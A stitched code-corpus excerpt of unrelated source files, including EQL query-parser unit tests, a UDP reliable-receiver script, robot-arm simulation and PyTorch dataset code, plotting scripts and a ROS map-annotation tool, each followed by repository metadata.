self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like~ \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like~ (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name regex~ (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where startsWith~(process_name, \"cmd.exe\")")
# optional fields in the schema
self.assertRaises(EqlSyntaxError, parse_query, 'process where ?process.name : "cmd.exe"')
self.assertRaises(EqlSyntaxError, parse_query, 'process where ?process_name : "cmd.exe"')
# optional fields not in the schema
self.assertRaises(EqlSyntaxError, parse_query, 'process where ?unknown_field : "cmd.exe"')
self.assertRaises(EqlSyntaxError, parse_query, 'process where ?unknown.field : "cmd.exe"')
subquery1 = '[process where opcode == 1] by unique_pid'
runs = [-1, 0, 1, 2, 10, 30]
for run in runs:
subquery2_runs = '[file where opcode == 0] by unique_pid with runs={}'.format(run)
self.assertRaises(EqlSyntaxError, parse_query, 'sequence {} {}'.format(subquery1, subquery2_runs))
with elastic_endpoint_syntax, schema, ignore_missing_functions:
# check elasticsearch-isms
parse_query('process where process_name : ("cmd*.exe", "foo*.exe")')
# support $variable syntax
parse_query('process where arraySearch(string_array, $variable, $variable == "foo")')
parse_query('process where arraySearch(obj_array, $sig, $sig.trusted == true)')
# support sequence alias
event0 = '[process where process.name == "abc.exe"]'
event1 = '[network where p0.process.name == process.name]'
event2 = '[network where p0.pid == 0]'
event3 = '[network where p0.badfield == 0]'
event4 = '!%s' % (event0)
parse_query('sequence %s as p0 %s' % (event0, event1))
parse_query('sequence by user.name %s as p0 %s' % (event0, event1))
parse_query('sequence with maxspan=1m %s by user.name as p0 %s by user.name' % (event0, event1))
parse_query('sequence by user.name %s as p0 %s' % (event0, event2))
self.assertRaises(EqlSchemaError, parse_query, 'sequence by user.name %s as p1 %s' % (event0, event2))
self.assertRaises(EqlSchemaError, parse_query, 'sequence by user.name %s as p1 %s' % (event0, event3))
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == 'cmd.exe'")
# negative runs not supported on the endpoint
self.assertRaises(EqlSemanticError, parse_query, 'sequence %s %s' % (event0, event4))
# as fields not emmitted by the endpoint
self.assertRaises(EqlSyntaxError, parse_query, 'process where client.as.organization.name == "string"')
self.assertRaises(EqlSyntaxError, parse_query, 'process where destination.as.organization.name == "string"')
def test_nested_fields(self):
"""Test nested fields."""
schema = Schema({
"process": {
"process_name": "string",
"pid": "number",
"string_array": ["string"],
"obj_array": ["string"],
"opcode": "number",
"process": {"name": "string"},
"unique_pid": "string",
"user": {"name": "string"},
"field": {"nested_field": [{"nf1": "string", "nf2": "number"}]},
},
"file": {
"opcode": "number",
"unique_pid": "string"
},
"network": {
"process": {"name": "string"},
"user": {"name": "string"}
}
})
with elastic_endpoint_syntax, schema:
# should fail since nf1 type is a string
self.assertRaises(EqlTypeMismatchError, parse_query,
'process where arraySearch(field.nested_field, $var, $var.nf1 == 3)')
# should fail since nf4 doesn't exist
self.assertRaises(EqlSchemaError, parse_query,
'process where arraySearch(field.nested_field, $var, $var.nf4 == "3")')
# should fail since the second $ is missing
self.assertRaises(EqlSchemaError, parse_query,
'process where arraySearch(field.nested_field, $var, var.nf2 == 3)')
parse_query('process where arraySearch(field.nested_field, $var, $var.nf1 == "three")')
parse_query('process where arraySearch(field.nested_field, $var, $var.nf2 == 3)')
| endgameinc/eql | tests/test_parser.py | test_parser.py | py | 39,771 | python | en | code | 203 | github-code | 13 |
41410155928 | #import pandas as pd
import matplotlib.pyplot as plt
def bubbleSort(lista, listaCount):
for i in range(len(lista)):
for j in range(len(lista)):
if int(lista[int(i)]) < int(lista[int(j)]):
lista[int(i)], lista[int(j)] = lista[int(j)], lista[int(i)]
listaCount[int(i)], listaCount[int(j)] = listaCount[int(j)], listaCount[int(i)]
return (lista, listaCount)
def listaCounter(listas):
lista = []
listaCount = []
for i in listas:
if i not in lista:
lista.append(i)
listaCount.append(1)
continue
listaCount[lista.index(i)] += 1
lista, listaCount = bubbleSort(lista, listaCount)
return (lista, listaCount)
filename = r"exercicioedjalma.csv"
# Lê o csv, o grava em um dataframe, e o transforma em um dicionário (Pandas)
'''df = pd.read_csv(filename)
dicionario = df.to_dict()'''
# Adiciona todas as datas em uma lista (Pandas)
'''datas = []
for i in dicionario.keys():
datas.append(i)
for j in dicionario[i].values():
datas.append(j)'''
# Armazena as linhas/datas do arquivo dentro de uma lista
datas = []
with open(filename, 'rt+') as arq:
for i in arq:
datas.append(i)
# Divide e armazena as datas em suas respectivas listas
anos = []
meses = []
dias = []
for data in datas:
data = data.split('/')
if data[0][0] == '0':
data[0] = data[0][1:]
if data[1][0] == '0':
data[1] = data[1][1:]
dias.append(data[0])
meses.append(data[1])
anos.append(data[2])
# Armazena os dias e suas respectivas quantidades em duas listas
'''dia = []
diaCount = []
for i in dias:
if i not in dia:
dia.append(i)
diaCount.append(1)
continue
diaCount[dia.index(i)] += 1
dia, diaCount = bubbleSort(dia, diaCount)'''
dia, diaCount = listaCounter(dias)
mes, mesCount = listaCounter(meses)
ano, anoCount = listaCounter(anos)
# Armazena os meses e suas respectivas quantidades em duas listas
'''mes = []
mesCount = []
for i in meses:
if i not in mes:
mes.append(i)
mesCount.append(1)
continue
mesCount[mes.index(i)] += 1
mes, mesCount = bubbleSort(mes, mesCount)'''
# Armazena os anos e suas respectivas quantidades em duas listas
'''ano = []
anoCount = []
for i in anos:
if i not in ano:
ano.append(i)
anoCount.append(1)
continue
anoCount[ano.index(i)] += 1
ano, anoCount = bubbleSort(ano, anoCount)'''
# Plota o gráfico dos dias
with plt.style.context('Solarize_Light2'):
plt.figure(figsize=(15, 5))
plt.bar(dia, diaCount)
plt.title('Quantidade de cada dia')
plt.xlabel('Dias')
plt.ylabel('Quantidade')
plt.show()
# Plota o gráfico dos meses
with plt.style.context('Solarize_Light2'):
plt.figure(figsize=(10, 5))
plt.bar(mes, mesCount)
plt.title('Quantidade de cada mês')
plt.xlabel('Meses')
plt.ylabel('Quantidade')
plt.show()
# Plota o gráfico dos anos
with plt.style.context('Solarize_Light2'):
plt.figure(figsize=(30, 5))
plt.bar(ano, anoCount)
plt.title('Quantidade de cada ano')
plt.xlabel('Anos')
plt.ylabel('Quantidade')
plt.show()
| BrunoViotto18/Bosch | 1 - Python/Aula 76 - 20_12_2021 - REVISÃO PYTHON/Revisão - SemiCópia/ExercicioEdjalma.py | ExercicioEdjalma.py | py | 3,216 | python | pt | code | 0 | github-code | 13 |
5293963074 | import pickle
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
def plot_result(fin_data_df, titulo, columna, y_label, idx, per_long=730):
x = fin_data_df['Dates'][idx:idx+per_long]
y = fin_data_df.iloc[idx:idx+per_long, columna]
plt.figure(figsize=(8, 6))
plt.plot(x, y, label='Precio fin de día')
plt.ylabel(y_label)
plt.legend()
plt.savefig("./figures/fig_S&P500_"+titulo)
plt.show()
plt.close()
idx_l = [2927, 7310, 4388, 6580]
#test_name_l = ['2008-2009', '2020-2021', '2012-2013', '2018-2019']
test_name_l = ['Rendimiento 2008-2009', 'Rendimiento 2020-2021', 'Rendimiento 2012-2013', 'Rendimiento 2018-2019']
fin_data_f = ".\data\csv\Financial Data.csv"
fin_data_df = pd.read_csv(fin_data_f, parse_dates=['Dates'] ,usecols=lambda column: column == 'Dates' or column=='S&P 500')
for idx, test_name in zip(idx_l, test_name_l):
fin_data_df['Rendimiento S&P500'] = fin_data_df.loc[:]['S&P 500']/fin_data_df.loc[idx]['S&P 500']*100
# plot_result(fin_data_df, test_name, 2, 'Rendimiento base 100', idx)
print(f"periodo {test_name}, rendimiento {fin_data_df['Rendimiento S&P500'][idx+730]-100}")
| falamo1969/AgenteInversionTFM | graficos.py | graficos.py | py | 1,192 | python | en | code | 0 | github-code | 13 |
16007318470 | import torch
import numpy as np
import nimblephysics as nimble
from solver.envs.rigidbody3d.r3d_pickup import PickUp
from solver.train_rpg import Trainer
from solver.envs.rigidbody3d.hooks import print_gpu_usage, record_rollout
from solver.envs.rigidbody2d.hooks import save_traj
from solver.envs.rigidbody3d.utils import arr_to_str
class Pick3Cube(PickUp):
def __init__(self, cfg=None, pad_dir_weight=0.75):
super().__init__(
cfg,
dt=0.005, frame_skip=0, gravity=-1.0,
cam_resolution=(512, 512),
A_ACT_MUL=0.01, X_OBS_MUL=2.0, V_OBS_MUL=1.0
)
self.pad_dir_weight = pad_dir_weight
self.A_ACT_MUL = torch.tensor(
[1 / 200, 1 / 150, 1 / 100, 1 / 100, 1 / 100, 1 / 100, 1 / 100]
# [1 / 200, 1 / 200, 1 / 200, 1 / 100, 1 / 200, 1 / 100, 1 / 100]
)
def init_simulator(self):
# arm
self.sim.arm = self.sim.load_urdf(
"gripper_v2.urdf",
restitution_coeff=self.restitution_coeff,
friction_coeff=self.friction_coeff,
mass=1)
# boxes
self.sim.box = [
self.sim.load_urdf(
"sphere.urdf",
restitution_coeff=self.restitution_coeff,
friction_coeff=self.friction_coeff,
mass=0.1, inertia=[0.1, 0.1, 0.1]),
self.sim.load_urdf(
"sphere.urdf",
restitution_coeff=self.restitution_coeff,
friction_coeff=self.friction_coeff,
mass=0.1, inertia=[0.1, 0.1, 0.1]),
self.sim.load_urdf(
"sphere.urdf",
restitution_coeff=self.restitution_coeff,
friction_coeff=self.friction_coeff,
mass=0.1, inertia=[0.1, 0.1, 0.1])
]
# ground
self.sim.load_urdf(
"ground.urdf",
restitution_coeff=self.restitution_coeff,
friction_coeff=self.friction_coeff)
# action only control arm, not other objects
for i in range(self.sim.arm.sapien_actor.dof, self.sim.world.getActionSize()):
self.sim.world.removeDofFromActionSpace(i)
# nimble arm forward kinematics
self.sim.arm_fk = nimble.neural.IKMapping(self.sim.world)
self.sim.arm_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("end_effector"))
# nimble pad forward kinematics
self.sim.pad_fk = nimble.neural.IKMapping(self.sim.world)
self.sim.pad_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("left_pad"))
self.sim.pad_fk.addLinearBodyNode(self.sim.arm.nimble_actor.getBodyNode("right_pad"))
def sample_state_goal(self, batch_size=1):
box_x = 0.4
box_y = (1 - box_x ** 2) ** 0.5
state = torch.tensor(
[
# arm qpos
-1.57 / 2 - 0.2, 0.7, -0.7, -0.2, 2.22, 0, 0,
0, 0, 0, 0, -0.399, 1.0,# -1.5,
0, 0, 0, box_y, -0.399, 1.0,# -(1.65 - box_x),
0, 0, 0, -box_y, -0.399, 1.0,# -(1.65 - box_x),
# 0, 0, 0, 0, -0.399, 0,
# 0, 0, 0, 0, -0.399, box_y,
# 0, 0, 0, 0, -0.399, -box_y,
# velocities
0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0,
]
)
goals = torch.tensor(
[
0, 0.4, 1.0,
box_y, 0.4, 1.0,
-box_y, 0.4, 1.0,
]
)
return state, goals
def get_reward(self, s, a, s_next):
# pos of boxes
boxes_s_next = torch.stack([
self.box_pos(s_next, i)
for i in range(len(self.sim.box))
])
# ee pos
# ee_s_next = nimble.map_to_pos(self.sim.world, self.sim.arm_fk, s_next) \
# + torch.tensor([0, -0.4, 0])
ee_s_next = nimble.map_to_pos(self.sim.world, self.sim.pad_fk, s_next).view(-1, 3).mean(dim=0)\
+ torch.tensor([0, -0.2, 0])
# select closest box
# boxi = (ee_s_next - boxes_s_next).norm(dim=1).min(dim=0)[1]
boxi = 0
self.text += f"\naction: {arr_to_str(a * self.A_ACT_MUL)}"
self.text += f"\nselected box: {boxi}"
box_s_next = boxes_s_next[boxi]
goal = self.goals.view(-1, 3)[boxi]
# pad facing
pad_angle = -(s[:3].sum() - s[4]) - np.pi
self.text += f"\npad angle: {pad_angle}"
self.text += f"\nee pos: {arr_to_str(ee_s_next.detach().numpy())}"
# rewards
reach_top = -(ee_s_next + torch.tensor([0, -0.2, 0]) - box_s_next).norm() ** 2
reach = -(ee_s_next - box_s_next).norm() ** 2
# gripper_facing = (pad_dir * ref_dir).sum() ** 2
gripper_center_deviate = -(s_next[5] - s_next[6]) ** 2
gripper_qpos_at_0 = -(s_next[5] ** 2 + s_next[6] ** 2)
gripper_close = -((s_next[5] - 0.12) ** 2 + (s_next[6] - 0.12) ** 2)
gripper_ground_penalty = ((ee_s_next[1] - 0.2 + 0.4) < 0) * (-(ee_s_next[1] - 0.2 + 0.4) ** 2)
if self.t < 50:
res = dict(
reward_reach=reach,
reward_gripper_facing=-(pad_angle ** 2 * self.pad_dir_weight),#gripper_facing * self.pad_dir_weight, # 0.75 is good
reward_gripper_center_deviate=gripper_center_deviate * 10,
reward_gripper_qpos=gripper_qpos_at_0 * 10,
gripper_ground_penalty=gripper_ground_penalty * 10,
)
else:
res = dict(
reward_reach=reach,
reward_box_pull=-((box_s_next - goal) ** 2).sum(),
reward_gripper_facing=-(pad_angle ** 2 * self.pad_dir_weight),
reward_gripper_center_deviate=gripper_center_deviate * 10,
reward_gripper_qpos=gripper_close * 10,
gripper_ground_penalty=gripper_ground_penalty * 10,
)
if self.t == 49 or self.t == 99:
print("here")
print(res)
return res
def main():
trainer = Trainer.parse(
env=dict(
TYPE="Pick3Cube",
n_batches=1,
),
actor=dict(
not_func=True,
a_head=dict(
TYPE='Normal',
linear=True,
squash=False,
std_mode='fix_no_grad',
std_scale=0.1)
),
# RPG
rpg=dict(
gd=True,
optim=dict(
accumulate_grad=5)
),
z_dim=1, z_cont_dim=0,
max_epochs=1000, n_batches=100,
record_gif_per_epoch=1,
device="cpu",
# book keeping
path="exp/aseq",
log_date=True
)
trainer.epoch_hooks.append(print_gpu_usage)
trainer.epoch_hooks.append(save_traj)
trainer.epoch_hooks.append(record_rollout)
trainer.start()
if __name__ == "__main__":
# import cv2
# env = Pick3Cube()
# obs = env.reset()
# while True:
# env.step(torch.randn(1, env.action_space.shape[0]))
# env.get_reward(env.sim.state, torch.zeros(env.action_space.shape[0]), env.sim.state)
# cv2.imwrite("debug.png", env.render(text=""))
# input()
# env.sim.viewer.create_window()
# while not env.sim.viewer.window.closed:
# # env.step(torch.zeros(env.action_space.shape[0]))
# env.render()
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
main()
| haosulab/RPG | solver/envs/rigidbody3d/r3d_pick3cube.py | r3d_pick3cube.py | py | 7,681 | python | en | code | 18 | github-code | 13 |
70061790099 | import sys
from socket import *
import zlib
# There is no need for Bob to detect end of transmission and terminate. If you need to
# manually terminate it, press <Ctrl> + c.
#Algorithm planning
#Global variables are here and initialised
clientAddress = 0
serverPort = int(sys.argv[1]) #Get the arguments
bobSocket = socket(AF_INET,SOCK_DGRAM) #declare initialised UDP
#clientSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
bobSocket.bind(('localhost',serverPort))
expectedSeq = 0
packets = []
#Socket functions ============================
# #compress the packet
# def compressPacket(message):
# return zlib.compress(message, level=-1)
# #deflate the packet as a string
# def deflatePacket(packet):
# return zlib.decompress(packet)
def calculateCheckSum(received:str):
checksum = zlib.crc32(received.encode())
return checksum
#returns true if it is corrupted
def isCorrupted(received:str, mine:str):
return not (received == calculateCheckSum(mine))
#Creates a Packet that is already encoded
#Requires Checksum, size of message, length, sequence number
#Packet header: seq checksum length
#
# You are reminded again that each packet Alice or Bob sends should contain at most 64
# bytes of payload data (inclusive of user-defined header/trailer fields), or UnreliNET
# will drop it.
def makePacket(index:int):
checksum = str(calculateCheckSum(str(index)))
packet = checksum + " " + str(index)
return packet.encode();
#returns the header and the message (Left over)
def getHeader(message):
i =0
message = message.decode()
while(not message[i:i+3] == " "):
i = i +1
if(i+3>len(message)):
return False
header = message [:i].split()
if(len(header)< 3):
return False
checksum = header[0]
calcChecksum = str(zlib.crc32(message[len(checksum) + 1:].encode()))
if (checksum != calcChecksum):
return False
# try:
# tocheck = header[1]+ " "+ header[2] + " " + message[i+3:]
# if(checkPacket(header[0],int(header[1]),tocheck) and ( header[2]!= "Y" or header[2] !="N")):
# sendMessage(makePacket(expectedSeq))
# #print("Bad packet")
# return False
# except ValueError:
# return False
return header[0],header[1],header[2],message[i+3:]
#returns true if the packet is correct
#checks that message is uncorrupted
#checks that the sequence is the same as the next expected
#Assumptions: assume that message is the correct length already
def checkPacket(checksum, sequence:int, message):
return (not isCorrupted(checksum, str(calculateCheckSum(message)))) and sequence <= expectedSeq
# Chat functions ===============================
#ensure the message is sent
def sendMessage(encodedMSG):
#print("Attempt send at BOB" , encodedMSG.decode())
bobSocket.sendto(encodedMSG,clientAddress)
#Bob Side of receiving
#Throws timeout error or invalid packet
def receiveMessage():
#print("Attempt recieve at BOB")
sentence = ""
nextByte = "Y"
global expectedSeq
global clientAddress
while(nextByte != "N"):
modifiedMessage, clientAddress = bobSocket.recvfrom(64) #receive
header = getHeader(modifiedMessage)
if(not header):
continue
#print("Recieved exp", message)
try:
checksum, EXPsequence, byte, message = header
int(EXPsequence)
except ValueError:
continue
if(int(EXPsequence) != expectedSeq): #check if recieve packet has been acked before
sendMessage(makePacket(expectedSeq))
#print("TResend ack")
continue #move on to the next packet
nextByte = byte
expectedSeq = expectedSeq + 1
sendMessage(makePacket(expectedSeq))
sys.stdout.write(message)
# sentence = sentence + message
#print(message)
#print("The message is: " , message)
#print("The sentence is ", sentence)
#print("Recieved successfull")
#MAIN PROGRAM HERE+===============================
receiveMessage()
# sys.stdout.write(sentence)
while True: #loop
#waits for something
modifiedMessage, clientAddress = bobSocket.recvfrom(64) #receive
sendMessage(makePacket(expectedSeq+1))
| Deunitato/CS2105_Assignments | meh/Bob.py | Bob.py | py | 4,334 | python | en | code | 0 | github-code | 13 |
29113393906 | def divide_errors(y_pred, y_test):
wrong_indices = {}
for i, (pred, ans) in enumerate(zip(y_pred, y_test)):
if pred != ans:
wrong_indices.setdefault(f"{ans}-{pred}", [])
wrong_indices[f"{ans}-{pred}"].append(i)
return wrong_indices
def count_pred_labels(y): # count each row num in heatmap
pred_labels = [0] * 10 # index express a true label
for ans in y:
pred_labels[int(ans)] += 1
print("pred_labels", pred_labels) # debug
return pred_labels
def identify_frequent_combinations(y_pred, y_test, threshold_rate):
wrong_indices = divide_errors(y_pred, y_test)
pred_labels = count_pred_labels(y_test)
frequent_combs = {}
for com, indices in wrong_indices.items():
ans = int(com[0])
rate = len(indices) / pred_labels[ans]
if rate >= threshold_rate:
frequent_combs[com] = wrong_indices[com]
return frequent_combs
| Kumamoto-Hamachi/knn_projects | divide.py | divide.py | py | 939 | python | en | code | 1 | github-code | 13 |
44625095981 | import numpy as np
from torch.utils.data import Dataset
import os
from PIL import Image as Image
import random
import torch
def random_crop(lr, hr, size, scale):
lr_left = random.randint(0, lr.shape[1] - size)
lr_right = lr_left + size
lr_top = random.randint(0, lr.shape[0] - size)
lr_bottom = lr_top + size
hr_left = lr_left * scale
hr_right = lr_right * scale
hr_top = lr_top * scale
hr_bottom = lr_bottom * scale
lr = lr[lr_top:lr_bottom, lr_left:lr_right]
hr = hr[hr_top:hr_bottom, hr_left:hr_right]
return lr, hr
def augment(lr, hr):
# random_vertical_flip
if random.random() < 0.5:
lr = lr[::-1, :, :].copy()
hr = hr[::-1, :, :].copy()
# random_rotate_90
if random.random() < 0.5:
lr = np.rot90(lr, axes=(1, 0)).copy()
hr = np.rot90(hr, axes=(1, 0)).copy()
# random_horizontal_flip
if random.random() < 0.5:
lr = lr[:, ::-1, :].copy()
hr = hr[:, ::-1, :].copy()
return lr, hr
def to_tensor(img):
img = torch.from_numpy(img.transpose((2, 0, 1))).float()
img = torch.div(img, 255.0)
return img
def get_train_list(lr_path, hr_path):
lr_list = sorted(os.listdir(lr_path))
hr_list = sorted(os.listdir(hr_path))
lr_path_list = [os.path.join(lr_path, str(i)) for i in lr_list]
hr_path_list = [os.path.join(hr_path, str(i)) for i in hr_list]
return lr_path_list, hr_path_list
def get_test_list(lr_path):
lr_list = sorted(os.listdir(lr_path))
lr_path_list = [os.path.join(lr_path, str(i)) for i in lr_list]
return lr_path_list
class TrainDataset(Dataset):
def __init__(self, lr_train_path, hr_train_path, patch_size, scale, is_train=True):
super(TrainDataset, self).__init__()
self.lr_train_path = lr_train_path
self.hr_train_path = hr_train_path
self.patch_size = patch_size
self.scale = scale
self.is_train = is_train
self.lr_path_list, self.hr_path_list = get_train_list(lr_train_path, hr_train_path)
def __getitem__(self, idx):
lr = np.array(Image.open(self.lr_path_list[idx]).convert('RGB'))
hr = np.array(Image.open(self.hr_path_list[idx]).convert('RGB')) # shape hwc
if self.is_train:
lr, hr = random_crop(lr, hr, self.patch_size, self.scale)
lr, hr = augment(lr, hr)
return to_tensor(lr), to_tensor(hr)
def __len__(self):
return len(self.lr_path_list)
def __str__(self):
return 'custom_train_dataset'
class TestDataset(Dataset):
def __init__(self, lr_test_path):
super(TestDataset, self).__init__()
self.lr_path_list = get_test_list(lr_test_path)
def __getitem__(self, idx):
lr_path = self.lr_path_list[idx]
lr = np.array(Image.open(lr_path).convert('RGB'))
return idx, to_tensor(lr), lr_path
def __len__(self):
return len(self.lr_path_list)
def __str__(self):
return 'custom_test_dataset'
| bigbye/RDN-SISR | code/custom_datasets.py | custom_datasets.py | py | 3,002 | python | en | code | 1 | github-code | 13 |
28905282158 | #! /usr/bin/python
# -*- coding: utf-8 -*-
import re,string
#import data_structure
def Save(lineid,sub,dec,output_file):
new_line = str(lineid) + "/dec:" + dec
for s in sub:
if not s[1] == "-":
input_sub = s[1] #主語
else:
input_sub = "-"
new_line = new_line + "," + s[0] + ":" + input_sub
else:
new_line = new_line + "\n"
f = open(output_file,"a+") # 読み書きモードで開く
old_line = f.read() #情報を読み込む
if re.findall(new_line,old_line) == []:
f.write(new_line) # 引数の文字列をファイルに書き込む
f.close() # ファイルを閉じる
def Ex_relates(clause_list,clause_num,clause,lineid,output_file):
counter = 0
#topic = []
for value in clause:
if counter == 0:
start_pos = 1
end_pos = value
else:
start_pos = end_pos + 1
end_pos = end_pos + value
counter += 1
#ここから*から*の範囲(文節の範囲)で情報を抽出していく
#情報の抽出を正規表現でしていく
for i in range(start_pos,end_pos + 1):
sentence = clause_list[i]
#print sentence
su1 = re.search(r"格解析結果:([^\s/]*)(/[^\s/]*)*:[^\s/]*:",sentence)
su2 = re.findall(r"[;;]?([^\s:;/]*)/[^\s/]/([^\s/]*)/[\w-]/[\w-]/[\w-];",sentence)
# for s in su2:
# print s[0],s[1]
if not su1 == None:
sub = su2
dec = su1.group(1) #用言
Save(lineid,sub,dec,output_file)
#data = data_structure.info(sub,dec)
#topic.append(data)
return
| pauwau/workspace | knp_distance/text_to_frame/ex_relates.py | ex_relates.py | py | 1,748 | python | en | code | 0 | github-code | 13 |
613750536 | #!/usr/bin/env python3
#coding: utf8
import lib
import numpy as np
import matplotlib.pyplot as plt
def delta(x,x0,N=1):
'''
should only be used on-grid. Implementation of the Dirac-delta.
'''
return N*np.isclose(x,x0)
class initialValues:
'''
Just a storage for initial values. Can be used in both simulations, hopf and
diffusion.
'''
def __init__(self,argv,eps=1e-2):
self.LENGTH = float(argv[1])
self.N_X = int(argv[2])
self.DELTA_X = self.LENGTH/(self.N_X-1)
self.N_T = int(argv[3])
self.DELTA_T = float(argv[4])
self.ALPHA_HOPF = self.DELTA_T/self.DELTA_X
self.ALPHA_HOPF_EQ = self.DELTA_T/self.DELTA_X
self.ALPHA_DIFFUSION = self.DELTA_T/self.DELTA_X**2
self.BoundaryType = argv[5]
self.xvec = np.linspace(0,self.LENGTH,self.N_X)
self.HopfFunc = np.exp(-(self.xvec-0.8)**2/2/0.05**2)
self.DiffFunc = delta(self.xvec,self.xvec[int(self.N_X/2)],N=self.N_X-1)
#self.DiffStep = 0.5*np.ones_like(self.xvec) + \
# 0.5*np.heaviside(self.xvec-0.5,1.0)
self.DiffStep = 0.5*np.ones_like(self.xvec) + \
0.5/np.pi*(np.pi/2+np.arctan((self.xvec-0.5)/eps))
def fourier_rect(t,h=1.0,N=8):
'''
get the fourier sum until term ´N´ for a rectangular function.
'''
res = np.zeros_like(t)
for n in range(1,N+1):
res += np.sin((2*n-1)*2*np.pi*t)/(2*n-1)
return res*4*h/np.pi
def many_steps(t,h=1.0,N=8):
'''
generate an approximation to a linear function with ´N´ steps.
'''
stepwidth = (t.max()-t.min())/N
stepsize = h/N
res = np.ones_like(t)*stepsize
for n in range(1,N):
res += np.heaviside(t-n*stepwidth,0.5)*stepsize
return res
def ran_profile(t,h=1.0,N=2):
'''
return a median-filtered random profile.
'''
import scipy.signal as sc_sig
filtnum = int(len(t)/N/2)*2+1
result = sc_sig.medfilt(np.random.rand(len(t)),filtnum)
return result*h
def make_bc(matrix,which):
'''
Applies the boundary conditions of choice to the matrix of the pde. Can
either treat periodic or reflecting boundary conditions. The scheme works
like it is presented in the slides for the assignment (and the written
solution to the assignment).
'''
size_x, size_y = matrix.shape
if which == 'periodic':
matrix[size_x-1][0] = matrix[0][1]
matrix[0][size_y-1] = matrix[1][0]
elif which == 'reflecting':
matrix[0][1] *= 2
matrix[size_x-1][size_y-2] *= 2
elif which == 'absorbing':
pass
else:
print('ERROR: No such option for the type of the boundary condition.')
# technically not the correct error, but too lazy for custom handlers.
raise ValueError
return matrix
class simulation:
'''
An almost useless class initially thought to gather all types of
simulations, but in fact not really used in that way (but just as storage
for results).
'''
def __init__(self, init, table, which):
self.simfun = table[which]
self.initialValues = init
def simulate(self, initial, const=1.0):
self.initial = initial
self.const = const
self.result = self.simfun(initial,self.initialValues,const)
def plot_init(self,label='initial',plot_default=True):
self.fig = plt.figure(figsize=(6,4))
self.ax = self.fig.add_subplot(111)
if plot_default:
self.ax.plot(self.initialValues.xvec,self.initial,label=label)
def plot(self,ax,label):
ax.plot(self.initialValues.xvec,self.result,label=label)
def plot_final(self,label,title):
self.ax.plot(self.initialValues.xvec,self.result,label=label)
self.ax.set_xlabel('$x$')
self.ax.set_ylabel('$u(x,t)$')
self.ax.grid()
self.ax.set_title(title)
self.ax.legend()
self.fig.tight_layout()
| alcubierre-drive/NTNU-TFY4235-2018 | Assignments/PartialDifferentialEquations/helpers.py | helpers.py | py | 3,942 | python | en | code | 0 | github-code | 13 |
32406715272 | import argparse
import rospkg
import json
import cv2
import numpy as np
import os.path
class mapDetails:
def __init__(self, args):
self.shelves = list()
self.shelves_h = list()
self.capture_stops = list()
rospack = rospkg.RosPack()
base_path = rospack.get_path('storeplanner')
map_filename = base_path + '/maps/' + args['store'] + '/' + args['map'] + '/map.pgm'
if not os.path.exists(map_filename):
print('Could not find map file.\nCheck file path.')
sys.exit(1)
self.details_path = base_path + '/models/' + args['store'] + '/details/'
if not os.path.exists(self.details_path):
os.makedirs(self.details_path)
self.img = cv2.imread(map_filename,cv2.IMREAD_COLOR)
def run(self):
ans = raw_input("Do you want to select the shelves? [y/n]\n")
if ans == 'y' or ans == 'yes':
cv2.namedWindow("Shelves selector",cv2.WINDOW_NORMAL)
cv2.resizeWindow("Shelves selector", self.img.shape[1], self.img.shape[0])
self.shelves = cv2.selectROIs("Shelves selector",self.img)
cv2.destroyWindow("Shelves selector")
ans2 = raw_input("Do you want to give shelves height? (default 2.0 meters for all) [y/n]\n")
if ans2 == 'y' or ans2 == 'yes':
self.shelves_h = self.calc_shelves_height()
else:
self.shelves_h = [2.0] * len(self.shelves)
self.save_shelves()
#the capture stops should be given to the robot as it will do the inventary
ans = raw_input("Do you want to select the capture stops? [y/n]\n")
if ans == 'y' or ans == 'yes':
cv2.namedWindow("Capture Stops selector",cv2.WINDOW_NORMAL)
cv2.resizeWindow("Capture Stops selector", self.img.shape[1], self.img.shape[0])
cv2.setMouseCallback("Capture Stops selector",self.mouse_callback)
while(True):
cv2.imshow("Capture Stops selector",self.img)
k = cv2.waitKey() & 0xFF
if k == 27: #esc
break
cv2.destroyWindow("Capture Stops selector")
self.save_capture_stops()
def calc_shelves_height(self):
shelves_h = list()
for shelf in self.shelves:
temp_img = self.img.copy()
(x, y, w, h) = shelf
cv2.rectangle(temp_img,(x,y),(x + w,y + h),(0,0,255),2)
cv2.namedWindow("Shelf Height calculator",cv2.WINDOW_NORMAL)
cv2.resizeWindow("Shelf Height calculator", int(self.img.shape[1]/2), int(self.img.shape[0]/2))
cv2.imshow("Shelf Height calculator",temp_img)
cv2.waitKey(300)
height = raw_input("Enter height for this shelf: ")
shelves_h.append(float(height))
cv2.destroyWindow("Shelf Height calculator")
return shelves_h
def save_shelves(self):
filename = self.details_path + 'shelves.json'
shelf_cnt = 0
data = {}
data['shelves'] = []
for shelf in self.shelves:
shelf_cnt = shelf_cnt + 1
(x, y, w, h) = shelf
data['shelves'].append({
'id': shelf_cnt,
'x': int(x),
'y': int(y),
'z': float(self.shelves_h[shelf_cnt-1]),
'w': int(w),
'h': int(h)
})
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def save_capture_stops(self):
filename = self.details_path + 'capture_stops.json'
stop_cnt = 0
data = {}
data['capture_stops'] = []
for stop in self.capture_stops:
stop_cnt = stop_cnt + 1
(x, y) = stop
data['capture_stops'].append({
'id': stop_cnt,
'x': int(x),
'y': int(y)
})
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def mouse_callback(self,event,x,y,flags,param):
if event == cv2.EVENT_LBUTTONDBLCLK:
self.img = cv2.circle(self.img,(x,y),3,(0,0,255),-1)
cv2.imshow("Capture Stops selector",self.img)
